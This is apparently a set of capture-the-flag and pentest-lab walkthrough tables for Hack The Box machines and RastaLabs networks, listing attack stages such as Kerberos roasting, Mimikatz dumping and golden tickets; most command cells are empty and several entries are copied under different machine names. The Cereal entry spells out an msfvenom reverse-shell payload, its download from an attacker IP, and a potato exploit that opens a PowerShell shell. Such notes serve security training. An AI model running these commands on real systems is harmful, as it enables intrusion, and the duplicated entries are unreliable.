Network Scenarios
# Network#1
LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts
# Network#2
Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket
# Network#3
always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service
# Network#4
Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DCSync Attack
# Network#5
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Online search for lab IP range | N/A |
2 | Enumeration | Port scanning with masscan | |
3 | Enumeration | Detailed host scanning with nmap | |
4 | Enumeration | Finding domain names with crackmapexec | |
# Reel
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | |
2 | Enumeration | Gobuster directory scanning | |
3 | Credential Harvesting | Gathering usernames | Gather usernames manually and create a |
4 | Credential Harvesting | Password spraying | |
5 | Phishing | Sending phishing emails | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder |
6 | Hash Cracking | Cracking NTLMv2 hash | |
7 | Access | PowerShell remote session | |
8 | Privilege Escalation | Creating a Symlink | |
9 | Privilege Escalation | Using Check-File command | |
10 | Exfiltration | Transferring files with nc.exe | |
# Jewel
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | |
2 | Web Enumeration | Checking server with Wappalyzer | Use Wappalyzer to identify backend technologies |
3 | Web Enumeration | Analyzing .git directory | Check the Gemfile in the .git directory for Ruby and Gem versions |
4 | Exploitation | Exploiting Ruby on Rails | Use a Ruby on Rails exploit |
5 | Post-Exploitation | Capturing request in Burp | Capture the request and modify it with the exploit |
6 | Post-Exploitation | Getting a reverse shell | Use netcat listener and send the exploit to get a reverse shell |
7 | Privilege Escalation | Cracking password hashes | Use John the Ripper to crack password hashes found in |
8 | Privilege Escalation | Using .google_authenticator file | Use the contents of |
9 | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work |
10 | Privilege Escalation | Gaining root access with GTFOBins | |
# Atom
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | |
2 | File Analysis | Analyzing executable file | |
3 | SMB Enumeration | Enumerating SMB shares | |
4 | SMB File Transfer | Transferring files via SMB | |
5 | Exploitation | Crafting malicious binary | |
6 | YML File Creation | Creating a .yml file for the exploit | Manual creation of |
7 | SMB File Transfer | Uploading .yml file via SMB | |
8 | Reverse Shell | Obtaining a reverse shell | Use Metasploit to listen for the reverse shell |
9 | Redis Exploitation | Exploiting Redis | |
10 | Password Decryption | Decrypting password | |
# Network1
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Data Analysis | Reading pcap file | Use NetworkMiner to read the |
2 | Cryptography | Decoding the flag | Use |
3 | File Preparation | Preparing files for decryption | Rename the secret file to |
4 | Key Conversion | Converting key for decryption | `$key = Get-Content key.txt |
5 | File Decryption | Decrypting the file | |
6 | Flag Retrieval | Retrieving the flag | The flag is |
# Network2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Enumerating credentials on WS02 | |
2 | Credential Dumping | Using Mimikatz to dump creds | Upload |
3 | Credential Decryption | Decrypting credentials | |
4 | Port Forwarding | Setting up port forwarding | |
5 | RDP Connection | Connecting via RDP with Remmina | Install Remmina, import |
6 | RDP Connection | Using xfreerdp to connect | |
7 | Flag Retrieval | Retrieving the flag | The flag is |
# Network3
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Enumeration | Finding LAPS group members | Enumeration to find |
2 | Credential Access | Dumping credentials with PowerSploit | |
3 | Credential Access | Using credentials for access | |
4 | Credential Access | Getting AD object with credentials | |
5 | Local Admin Passwords | Retrieving local admin passwords | Passwords are listed for WS01, WS02, WS03, WS04, WS05 |
6 | Port Forwarding | Setting up port forwarding with Meterpreter | |
7 | Exploitation | Using MS17-010 exploit for admin shell | |
8 | Flag Retrieval | Retrieving flags from WS02 and WS04 | Flags are |
9 | Post-Exploitation | Running Mimikatz on WS02 | |
10 | File Permissions | Modifying file permissions for flag | |
# Network4
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Privilege Escalation | AS-REP Roasting | |
2 | Hash Extraction | Saving Hash | Copy the hash to a txt file and save it with UTF-8 encoding |
3 | Wordlist Creation | Using kwprocessor | |
4 | Password Cracking | Using John the Ripper | Use John the Ripper (jumbo version) to crack the hash |
5 | Credential Use | User Enumeration | |
6 | Flag Retrieval | Accessing Flag | The flag is |
# Network5
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Enumeration | Viewing shares on | |
2 | Enumeration | Using PowerSploit for enumeration | |
3 | Flag Retrieval | Accessing open shares | Flag is |
# Network6
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Phishing | Creating phishing HTA | |
2 | Web Server Setup | Hosting HTA on Apache2 | |
3 | Listener Setup | Setting up Metasploit listener | |
4 | Share Enumeration | Viewing shares on the network | |
5 | User Enumeration | Displaying domain user accounts | |
6 | User Information | Viewing user info | |
7 | Group Enumeration | Viewing domain group members | |
8 | Drive Enumeration | Listing logical drives | |
9 | Network Recon | Pinging servers for IP addresses | |
10 | Flag Retrieval | Accessing the flag | Flag is |
11 | KeePass Database | Found KeePass database and key file | Located in |
# Network7
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | User Enumeration | Finding user directory on | |
2 | Network Drive Mount | Mounting network drive to access file | |
3 | File Conversion | Converting .ppk to OpenSSH format | |
4 | Network Configuration | Adding route and running proxy server | Commands for adding route and running socks4a proxy server on |
5 | SSH Connection | Connecting via SSH with proxychains | |
6 | Privilege Escalation | Using exploit for privilege escalation | Compile exploit with |
7 | File Transfer | Transferring exploit to target | |
8 | File Download | Downloading file from remote to local | |
9 | Flag Retrieval | Retrieving the flag | Flag is |
# Network8
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to | |
2 | Remote Execution | Using Metasploit psexec for shell | Use msf psexec to get a shell on |
3 | Remote Execution | Using Impacket psexec for shell | Use Impacket psexec to get a shell on |
4 | Proxy Configuration | Setting SOCKS4a proxy in Metasploit | Set socks4a proxy in msf, then edit |
5 | Enumeration | Using CrackMapExec to enumerate | |
6 | Hash Dumping | Dumping hashes | Dump hashes with CrackMapExec and proxychains |
7 | Credential Access | Accessing vault with Mimikatz | Use Mimikatz on |
8 | Credential Decryption | Decrypting credentials | |
9 | Impersonation | Impersonating user with Incognito | In meterpreter, load incognito and impersonate |
10 | Clipboard Monitoring | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard |
11 | RDP Connection | Connecting via RDP with credentials | |
12 | Flag Retrieval | Retrieving the flag | Flag is |
# Network9
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Forwarding port to ws05 | |
2 | Credential Use | Using rweston_da hash | |
3 | Exploitation | Exploit via smb/psexec | Use the hash with smb/psexec to exploit |
4 | Flag Retrieval | Retrieving the flag | Flag is |
# Network10
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Using | Log in to |
2 | Lateral Movement | RDP to | RDP to |
3 | Malware Execution | Running | Run |
4 | Credential Dumping | Invoke Mimikatz from | Use option 4 in |
5 | Credential Use | Pass-the-hash with Mimikatz | |
6 | Golden Ticket Attack | Perform DCSync to get | Use option 10 in |
7 | Golden Ticket Attack | Generate golden ticket | |
8 | Golden Ticket Attack | Use golden ticket | |
9 | Flag Retrieval | Accessing the flag | |
# Network11
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Access | Using | Log in to |
2 | Lateral Movement | RDP to | Take RDP of |
3 | Database Access | Start SQL Management Studio | Start SQL Management Studio and connect via Windows authentication |
4 | Database Querying | Querying SQL database | |
5 | Flag Retrieval | Retrieving the flag from database | |
# Network12
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Use | Logging in with | |
2 | Lateral Movement | RDP to | |
3 | GPO Enumeration | Enumerating GPO permissions | `Get-NetGPO |
4 | Group Membership | Checking group members | |
5 | GPO Permission | Finding GPO with weak permissions | `Get-NetGPO -ComputerName fs01.rastalabs.local |
6 | OU Enumeration | Finding host with specific policy | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}" |
7 | Policy Enumeration | Identifying applied policy | `Get-NetGPO -ComputerName fs01.rastalabs.local |
8 | GPO Abuse | Creating and applying immediate tasks | |
9 | File Permissions | Modifying permissions for | |
10 | Flag Retrieval | Retrieving the flag | Flag is |
# SneakyMailer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap scan | |
2 | DNS Enumeration | Brute-force subdomains | |
3 | Email Gathering | Extract emails | Extract emails from |
4 | Phishing | Send phishing emails | Use |
5 | Credential Harvesting | Decode credentials | Use Burp Suite to decode credentials from intercepted traffic |
6 | Email Client Setup | Configure email client | Set up |
7 | FTP Access | Access FTP | |
8 | Reverse Shell | Upload and trigger reverse shell | Upload |
9 | Privilege Escalation | Add SSH key to authorized keys | Add generated SSH key to |
10 | Sudo Exploitation | Exploit sudo permissions | Use |
# Mango
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Scanning | Masscan and Nmap | |
2 | Web Enumeration | Checking web ports | Access web service on ports 80 and 443 |
3 | SSL Certificate | Viewing certificate | View SSL certificate details |
4 | Host File Editing | Adding VHOST to hosts file | Edit |
5 | NoSQL Injection | Bypassing login | Use Burp Suite to intercept and modify request for NoSQL injection |
6 | Data Extraction | Automating credential extraction | Run Python script to extract credentials for |
7 | SSH Connection | Accessing SSH | SSH into the server using extracted credentials |
8 | User Flag Access | Retrieving user flag | Use |
9 | Privilege Escalation | Exploiting SUID file | Use SUID file to read root flag or exploit for root access |
10 | Root Flag Access | Reading root flag | Run binary or use |
# Time
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | |
2 | Web Vulnerability Scan | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create |
4 | Initial Access | Gaining a shell as user | Input crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using | Add your SSH public key to |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture |
# Tabby
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | |
2 | Web Enumeration | Checking for JSON vulnerabilities | Use JSON Beautifier and Validator on |
3 | Exploitation | Exploiting CVE-2019-12384 in fasterxml | Create |
4 | Initial Access | Gaining a shell as user | Input crafted JSON to trigger the exploit and gain a shell |
5 | Privilege Escalation | Using | Add your SSH public key to |
6 | Alternative Privilege Escalation | Escalating privileges without SSH key | Use |
7 | Flag Capture | Capturing user and root flags | Use the gained shell to capture |
# Quick
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | |
2 | Web Enumeration | Dirbuster scan | |
3 | QUIC Protocol Access | Accessing HTTP/3 Protocol | |
# ForwardSlash
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap scan | |
2 | Subdomain Enumeration | WFUZZ fuzzing | Use WFUZZ with common wordlists to find subdomains |
3 | Directory Enumeration | GoBuster scanning | Use GoBuster to enumerate directories |
4 | LFI Vulnerability | Exploiting Local File Inclusion | Use Burp Suite to exploit LFI and directory traversal |
5 | Database Credential Access | Obtaining credentials via LFI | Use LFI to read |
6 | API Exploitation | Using php://filter wrapper | Exploit API with |
7 | FTP Credential Access | Decoding Base64 for credentials | Decode Base64 to find FTP credentials |
8 | SSH Access | Using FTP credentials for SSH | Use FTP credentials to access SSH |
9 | User Flag Acquisition | Enumerating user directories | Find and read |
# P.O.O
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning | |
2 | Directory Enumeration | Fuzzing with WFUZZ | |
3 | Exploitation | Exploiting .DS_Store File | Use |
# P.O.O 2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | |
2 | Web Enumeration | WFUZZ Directory Discovery | |
3 | Git Repository Cloning | Using GitDumper | |
4 | Memcached Credential Access | Using memcached-cli to retrieve credentials | |
5 | Password Cracking | Using John the Ripper | Use John the Ripper with retrieved hashes |
6 | Gogs Service Access | Logging into Gogs with cracked credentials | Log into Gogs service at port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack |
# Dyplesher
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | |
2 | Web Enumeration | WFUZZ Directory Discovery | |
3 | Cloning Exposed Repository | Using GitDumper | |
4 | Memcached Credential Access | Using memcached-cli | |
5 | Cracking Hashes | Using John the Ripper | Use John the Ripper with retrieved hashes |
6 | Gogs Service Access | Logging into Gogs | Log into Gogs service at port 3000 |
7 | Git Bundle Analysis | Unpacking Git Bundles | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack |
# Cascade
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | |
2 | User Enumeration | Enum4Linux | |
3 | LDAP Enumeration | Impacket LDAPSearch | |
4 | SMB Enumeration | Accessing SMB Shares | |
5 | Log Analysis | Reviewing Service Logs | |
6 | Registry Analysis | Downloading and Analyzing Registry | |
7 | Password Decryption | Decrypting VNC Passwords | Use online HEX decoder or VNC password decryption tool |
8 | Remote Access | Using Evil-WinRM | |
9 | Share Enumeration | Listing SMB Shares | |
10 | Database Analysis | Analyzing SQLite Database | Open |
# Blunder
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | |
2 | Web Enumeration | Fuzzing with Extensions | |
3 | Exploit Identification | Searchsploit | |
4 | Brute Force Attack | Using Custom Script | Custom Python script for brute-forcing |
5 | Exploitation | Metasploit Framework | |
6 | Shell Stabilization | Python TTY Spawn | |
7 | User Privilege Discovery | Checking Sudo Permissions | |
8 | Privilege Escalation | Exploiting Sudo Bug CVE-2019-14287 | |
# Worker
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scanning | |
2 | SVN Enumeration | SVN Commands | |
3 | Sub-Domain Discovery | Adding Sub-Domains to Hosts | Edit |
4 | SVN Log Analysis | Viewing SVN Logs | |
5 | SVN Diff Analysis | Viewing SVN Diffs | |
6 | Azure DevOps Access | Logging into Azure DevOps | Use credentials to log into |
7 | Malicious File Upload | Creating and Uploading ASPX File | |
8 | Meterpreter Shell | Getting Reverse Shell | Set up listener with |
9 | Post-Exploitation | Meterpreter Commands | |
# Jerry
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scanning | |
2 | Access Tomcat | Default Credentials | Use default credentials |
3 | Deploy WAR | MsfVenom WAR File Creation | |
4 | Gain Shell | Netcat Listener | |
5 | Privilege Check | Whoami Command | |
6 | Flag Acquisition | Directory Navigation and Reading | Navigate to |
# Admirer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning | |
2 | Accessing FTP | Using Found Credentials | Use |
3 | Exploring Web Server | Checking | Access |
4 | Downloading Files | Using FTP to Download Files | Download |
5 | Code Analysis | Reviewing PHP Scripts | Analyze |
6 | SSH Access | Using Credentials for SSH | Use |
7 | Privilege Escalation | Analyzing Sudo Permissions | Run |
8 | Exploiting Scripts | Using | Exploit the |
9 | Gaining Root | Python Path Hijacking | Use |
# Laser
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning | |
2 | Accessing FTP | Using Found Credentials | Use |
3 | Exploring Web Server | Checking | Access |
4 | Downloading Files | Using FTP to Download Files | Download |
5 | Code Analysis | Reviewing PHP Scripts | Analyze |
6 | SSH Access | Using Credentials for SSH | Use |
7 | Privilege Escalation | Analyzing Sudo Permissions | Run |
8 | Exploiting Scripts | Using | Exploit the |
9 | Gaining Root | Python Path Hijacking | Use |
# Unbalanced
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Enumeration | Nmap Scanning | |
2 | Accessing Rsync | Listing Rsync Modules | |
3 | Downloading Backups | Using Rsync to Download Files | |
4 | Decrypting Backups | Decrypting EncFS | |
5 | Reading Files | Accessing Decrypted Configuration Files | |
# SneakyMailer
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Information Gathering | Nmap Scanning | |
2 | Subdomain Enumeration | Using | |
3 | Email Collection | Extracting Emails from Web Page | Manually visit |
4 | Email Engagement | Sending Emails with | |
5 | Credential Harvesting | Netcat Listener | |
6 | Accessing SMTP | Using | |
7 | Exploring Sent Items | Checking Sent Emails | Check sent items for any useful information after accessing the SMTP server |
# Notebook
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Web Server Analysis | Manual inspection of web application on port 80/tcp |
2 | Vulnerability Analysis | JWT Token Analysis | Decode JWT token, notice "kid" parameter pointing to an internal address |
3 | Exploitation | Custom JWT Token Creation | Develop |
4 | Administration Panel Access | Access with JWT Token | Use generated JWT token to access the admin panel |
5 | Web Shell Upload | PHP File Upload | Upload a malicious PHP file as allowed by the admin panel |
6 | Reverse Shell | Exploit PHP File | Get a reverse shell as |
7 | Post-Exploitation | User Access | Use |
8 | Privilege Escalation | Docker Exploitation | Use |
9 | Root Access | CVE-2019-5736 Exploit | Modify and run CVE-2019-5736 exploit to get root access |
# AI
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scan | |
2 | Web Enumeration | Manual Inspection | Inspect web application on port 80/tcp, hover over logo for menu |
3 | Web Enumeration | Gobuster Directory Scan | |
4 | Audio File Handling | Convert MP3 to WAV | |
5 | SQL Injection | Extract Database Name | Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database" |
6 | SQL Injection | Enumerate Table Names | Audio payload: "one open single quote union select test from test comment database" |
7 | SQL Injection | Enumerate Users Table | Audio payload: "one open single quote union select test from users comment database" |
8 | SQL Injection | Extract Passwords | Audio payload: "one open single quote union select password from users comment database" |
9 | Privilege Escalation | Exploit JDWP Service | Use |
# ServMon
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Recon | Nmap Scan | |
2 | FTP Enumeration | Anonymous FTP Access | |
3 | File Analysis | Reviewing Downloaded Files | |
4 | Web Enumeration | Enumerate Web Pages | Manual inspection of web application on port 80/tcp |
5 | Exploitation | Exploit NVMS-1000 (CVE-2019-2085) | Use CVE details from Exploit-DB and Burp Suite to exploit |
6 | Credential Access | Extract Passwords via Directory Traversal | |
7 | Brute Force | SSH Brute Force with Hydra | |
8 | SSH Access | Login via SSH | SSH login with found credentials |
9 | Privilege Escalation | Exploit NSClient++ 0.5.2.35 | Follow CVE details from Exploit-DB to exploit NSClient++ |
10 | Local Port Forwarding | Port Forwarding via SSH | Use SSH port forwarding to interact with local services |
# OpenAdmin
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan | |
2 | Web Enumeration | Manual Visit, Gobuster | Visit |
3 | Exploitation | OpenNetAdmin RCE | Use exploit from |
4 | Initial Foothold | Reverse Shell | Gain reverse shell as |
5 | User Access | Password Reuse | SSH as |
6 | Internal Service Access | Port Forwarding | Forward port 52846 to local machine and access internal service |
7 | Privilege Escalation | Cracking Hash | Crack |
8 | SSH Key Access | Decrypt SSH Key | Use |
9 | Root Access | Sudo Exploitation of Nano | Use |
# Magic
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Nmap Scanning | Nmap Scan | |
2 | Enumerating Web Page | Manual Visit | Visit |
3 | Bypass Login | SQL Injection | Use |
4 | Uploading Shell | Bypass File Upload Restrictions | |
5 | Gaining Access | Reverse Shell | |
6 | Enumerating Credentials | Reading Configuration Files | |
7 | Switching User Shell | User Switching | |
8 | Find SUID files | Privilege Escalation | Not specified in the summary |
9 | Getting ROOT | Exploitation | Not specified in the summary |
# Spectra
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan | |
2 | Web Enumeration | Manual Visit, Gobuster | Visit |
3 | Web Enumeration | Inspect Source Code | Inspect source code of |
4 | Credential Access | Username and Password Discovery | Found credentials: username |
5 | Web Exploitation | WordPress Admin Login | Login to WordPress admin panel with found credentials |
6 | Reverse Shell | Metasploit Reverse Shell | Use |
7 | Privilege Escalation | Sudo Privileges Exploitation | Use |
8 | Privilege Escalation | Editing Service Configuration | Edit |
9 | Privilege Escalation | Gaining Root Access | Execute |
# Sink
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan | |
2 | Web Enumeration | Inspect Source Code | Inspect source code for CVE-2019-18277 vulnerability |
3 | Exploitation | HTTP Request Smuggling | Edit and send crafted HTTP requests to exploit CVE-2019-18277 |
4 | Post-Exploitation | Capture Admin Cookie | Reload the home page to capture the admin cookie after the exploit |
5 | Privilege Access | Use Credentials Found in Notes | Use credentials from notes to access different services (Chef, Dev Node, Nagios) |
6 | Privilege Access | Access Gitea Service | Log in to Gitea service with found credentials |
7 | Privilege Access | Find SSH Key for User | Find |
8 | Privilege Access | Use SSH Key to Gain Access | Use |
# Ready
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan | |
2 | Web Enumeration | GitLab Sign In Page | Inspect GitLab sign in page for vulnerabilities |
3 | Exploitation | GitLab 11.4.7 Remote Code Execution | Follow steps from LiveOverflow video & article for RCE |
4 | Reverse Shell | Gain Reverse Shell | Use the payload from the video to gain a reverse shell |
5 | Post-Exploitation | Find Credentials | Locate |
6 | Privilege Access | Use Found Credentials | Use found SMTP password to change user and gain root access in the docker container |
7 | Privilege Escalation | Escaping Docker Container | Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges |
8 | Root Access | SSH Key | Use the provided |
# Pivotapi
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap Scan | |
2 | FTP Enumeration | Anonymous FTP Access | |
3 | Metadata Analysis | ExifTool Analysis | `exiftool * |
4 | Kerberos Attack | GetNPUsers.py Kerberos Preauthentication | |
5 | Hash Cracking | John the Ripper | |
# Openkeys
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Scanning | Nmap Scan | |
2 | Web Enumeration | Directory Scan | |
3 | Exploitation | Vulnerability in OpenBSD | Use |
4 | SSH Key Discovery | Cookie Modification | Modify the cookie to include a valid username to reveal SSH keys |
5 | SSH Access | Use Discovered SSH Key | |
6 | Privilege Escalation | Local Exploit for OpenBSD | |
# Oouch
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Nmap Scan | |
2 | Web Enumeration | Directory Scan | |
3 | OAuth Exploitation | SSRF in Contact Page | Use SSRF to link account with admin |
4 | Access Token | Intercept Request with Burp | Intercept |
5 | SSH Key Discovery | Accessing SSH Private Keys | Access API to retrieve SSH keys |
6 | Docker Exploitation | Exploit Docker UWSGI Service | Log into Docker and exploit UWSGI service running as www-data |
7 | Privilege Escalation | Exploit Dbus | Exploit Dbus to get a shell as root and obtain root.txt |
# Fuse
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scan | |
2 | Enumeration | Enumerating SMB, HTTP, and RPC | |
3 | Exploitation | Password Spraying | |
4 | Privilege Escalation | Abusing SeLoadDriverPrivilege | Compiling files with Visual Studio, using |
5 | Post-Exploitation | Accessing Admin Shell | |
# Cereal
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Port scanning with Nmap, adding domain names to the `/etc/hosts` file | `nmap -sC -sV -oA /result 10.10.10.217`, `cat nmap/result.nmap` |
2 | Enumeration | Using Gobuster to find directories, dumping the `.git` directory with GitTools | `gobuster dir -u http://cereal.htb -w wordlist`, `bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/` |
3 | Exploitation | Exploiting Cross-site Scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell | `python3 jwt_tool.py -b -S hs256 -p 'secret'`, `bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/` |
4 | Gaining Access | Uploading and executing a shell, using Python scripts to automate tasks | `python3 -m http.server 80`, `nc -nvlp 9001`, `python3 dedsec.py`, `curl -k https://source.cereal.htb/uploads/shell.aspx` |
5 | Privilege Escalation | Port forwarding, exploiting the `SEImpersonation` privilege with JuicyPotato, using GraphQL for SSRF | `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe`, `curl http://10.10.14.6/ded.exe -o C:\temp\ded.exe`, `nc -nvlp 1337` |
6 | Post-Exploitation | Maintaining access, executing reverse shells | `.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889` |
# Bucket
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scan to find open ports | |
2 | Enumeration | Gobuster to find directories | |
3 | AWS Configuration | Configure AWS CLI | |
4 | Data Extraction | List tables and contents in DynamoDB | |
5 | Exploitation | Upload PHP reverse shell to the server | |
6 | Privilege Escalation | Port forwarding and exploiting a web service for code execution as root | Create and trigger payload to get root's id_rsa |
# Armageddon
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | |
2 | Exploitation | Drupalgeddon 2 Forms API Property Injection | |
3 | Gaining Access | Finding credentials in settings.php | Inspect |
4 | Database Access | Accessing MySQL database | |
5 | Data Exfiltration | Dumping usernames and password hashes | |
6 | Password Cracking | Using John the Ripper to crack password hashes | |
7 | Access with SSH | SSH into the machine with cracked credentials | |
8 | Privilege Escalation | Exploiting snapd (dirty_sock exploit) | Use the dirty_sock exploit to escalate privileges |
9 | Capture Flag | Reading user and root flags | |
# Traceback
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Recon | Nmap scanning | |
2 | Enumeration | Source code analysis, Gobuster | |
3 | Exploitation | Accessing web shell | Navigate to |
4 | Access | SSH key upload | |
5 | Initial Access | SSH as webadmin | |
6 | Privilege Escalation (User) | Using | |
7 | Capture User Flag | Reading user flag | |
8 | Privilege Escalation (Root) | Modifying | |
9 | Capture Root Flag | Reading root flag | |
# Rastalab1
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Initial Scanning | Masscan | |
2 | Host Discovery | Nmap Scan | |
3 | Domain Discovery | CrackMapExec | |
4 | Network Mapping | Host Enumeration | Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc. |
# Rastalab2
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Reconnaissance | Outlook Version Discovery | Check outlook version on port 443 at 10.10.110.254 |
2 | Enumeration | Web Page Analysis | Analyze Rastalabs website on 10.10.110.10 on port 80 |
3 | User Profiling | Social Media Analysis | Review Amber Hope's LinkedIn and Instagram profiles |
4 | Credential Access | Brute Force | Use Metasploit |
5 | Access | Outlook Login | Login with credentials 'RLAB\ahope' : 'Labrador8209' |
6 | Flag Discovery | Task Navigation | Navigate to tasks in Outlook to find the flag |
# Rastalab3
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Credential Dumping | Vault Credential Extraction | |
2 | Credential Dumping | Mimikatz Execution | |
3 | Credential Decryption | DPAPI Master Key Usage | |
4 | Remote Desktop | Port Forwarding | |
5 | Remote Desktop | Remmina Configuration | Import |
6 | Remote Desktop | FreeRDP Connection | |
7 | Flag Discovery | Task Navigation | Flag found: |
# Rastalab4
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | GPO Enumeration | Group Policy Object Enumeration | `Get-NetGPO |
3 | Group Membership | Group Membership Checking | |
4 | GPO Permission Find | GPO Permission Enumeration | `Get-NetGPO -ComputerName fs01.rastalabs.local |
5 | GPO Abuse | Group Policy Object Abuse | |
6 | Add to Administrators | Adding User to Administrators Group | |
7 | Clean Up | Group Policy Object Task Removal | |
8 | File Permissions | Modifying File Access Control Lists | |
9 | Flag Discovery | Retrieving Sensitive Information | Flag found: |
# Rastalab5
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | SQL Interaction | SQL Server Management Studio | Start SQL Management Studio, connect via Windows authentication, query Umbraco database |
3 | Data Extraction | SQL Query Execution | |
4 | Flag Discovery | SQL Data Retrieval | |
# Rastalab6
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | RDP Access | Remote Desktop Protocol | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using |
2 | Credential Dumping | Invoke Mimikatz | Run |
3 | Pass-the-Hash | Mimikatz Pass-the-Hash | |
4 | Golden Ticket | Kerberos Golden Ticket Attack | |
5 | Ticket Injection | Kerberos Ticket Injection | |
6 | Flag Discovery | Access Domain Controller | |
# Rastalab7
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Local Port Forwarding | |
2 | Remote Shell Access | MSF psexec / Impacket psexec | Use msf or impacket psexec to get shell on ws01 |
3 | Routing | Meterpreter Routing | Add route in meterpreter, set socks4a proxy in msf |
4 | Hash Dumping | CrackMapExec with Proxychains | |
5 | Credential Access | Mimikatz Credential Dump | |
6 | Clipboard Monitoring | PowerShell Clipboard Monitoring | Use PowerShell to monitor clipboard: |
7 | RDP Connection | Remote Desktop Connection | |
8 | Flag Discovery | Flag Retrieval | Flag found: |
# Rastalab8
ID | Stage | Techniques | Commands |
---|---|---|---|
1 | Port Forwarding | Local Port Forwarding | |
